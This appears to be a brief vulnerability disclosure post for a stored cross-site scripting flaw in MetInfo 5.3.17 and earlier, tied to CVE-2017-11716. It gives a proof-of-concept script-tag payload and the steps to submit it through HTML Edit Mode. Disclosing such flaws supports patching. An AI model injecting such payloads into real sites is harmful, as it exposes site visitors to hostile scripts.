Store XSS Vulnerability in Metinfo Version <=5.3.17

MetInfo through 5.3.17 allows stored XSS via HTML Edit Mode.

change to html edit mode and post in this xss payload :



<p>
23231wqeqwe
</p><script>alert(123);</script>

then visit the page can find xss

> [Discoverer]
> Lncken

Use CVE-2017-11716.

Reply